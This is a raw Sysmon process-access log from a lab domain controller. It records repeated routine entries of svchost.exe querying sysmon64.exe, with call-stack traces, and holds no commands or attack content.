10341000x80000000000000001603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.986{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.955{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 